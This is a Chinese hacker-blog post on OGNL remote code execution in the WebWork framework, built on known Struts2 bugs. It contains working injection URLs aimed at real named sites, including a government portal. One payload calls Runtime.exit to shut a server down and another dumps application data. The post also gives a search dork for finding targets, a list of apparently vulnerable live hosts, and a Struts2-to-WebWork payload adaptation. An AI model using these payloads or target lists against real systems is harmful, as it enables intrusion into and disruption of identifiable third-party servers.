记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

祭奠那些年被遗忘的远程代码执行漏洞的框架

2013-11-12 11:15
webWork是建立在称为XWork的Command模式框架之上的强大的基于Web的MVC框架。
 
详细见百科:http://baike.baidu.com/view/25660.htm
 
  作为j2ee史上一个重要而强大的MVC框架,当struts1框架走到尽头时,是它充当了struts1到struts2过度时期的替代品,从strust2选择与webWork合并时,复用其大量核心代码及结构不难看出它的强大!
 
由于struts2大量保留webWork的一些功能及特性,所以struts2非自身添加的新功能或特性漏洞的地方,webWork同样存在!只是写PoC及exp时要读一下webWork的源代码!
 
比如:2010年7月,我们熟悉的struts2漏洞PoC:



http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den

yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti

me()))=1







http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den

yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti

me()))=1

 

再比如:最近这个s016,struts2漏洞PoC:
 
 
 

http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}


http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}

 

 
 
 
http://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.action
 
 
当然,webWork使用范围肯定不只这么点广:
 
比如:上海漫索计算机科技有限公司的大量应用及他们的产品Mainsoft就大量使用webWork框架:
 
 
http://www.mansuo.com/home/index.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
 
 
Mainsoft软件用户列表:
 
http://www.mansuo.com/home/newsList.action?typeIds=2
 
 
本身如果部署在内网,还可以缓解一下危害,但有些还是部署在外网。
 
 
 
比如google key:
 
intitle:集成化研发管理平台登录页面
 



本身就算部署在外网,没有进入webWork框架流程的url,也是没用的(好象是struts1及webWork混合在用)。但找到了一个开启了外部webWrok实现的注册功能:
 
 
 
 
 
http://114.242.194.148/rdms/satisfyaid/actions/cstContactAction!register.action
 
http://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.action
 
http://218.85.36.216:8085/rdms/satisfyaid/actions/cstContactAction!register.action
 
http://center.ylzinfo.com:8085/rdms/satisfyaid/actions/cstContactAction!register.action
 
http://rdms.mansuo.com/rdms/satisfyaid/actions/cstContactAction!register.action
 
http://service.epsoft.com.cn/rdms/satisfyaid/actions/cstContactAction!register.action
 
http://116.228.221.108:22480/rdms/satisfyaid/actions/cstContactAction!register.action
 
。。。。
 
 
 
ps:// 因为不会再有补丁,命令执行及写入webShell的exp和寻找目标的方法,肯定不能说!如果你真的有心(虽然它的很多特征与struts2相同),但熟悉后就很容易了!
 
比如,其中一个PoC的对比,我只轻轻改一个地方:
 
 
 
struts2:
 
redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22struts2Bug-67c2c13e9cc0c312973c90245537fd04%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
 
 
webWork:
redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22webWorkBug-9de3deb185db08ab775d3fa8ad6aed8e%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
知识来源: www.2cto.com/Article/201311/256915.html

阅读:104704 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“祭奠那些年被遗忘的远程代码执行漏洞的框架”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云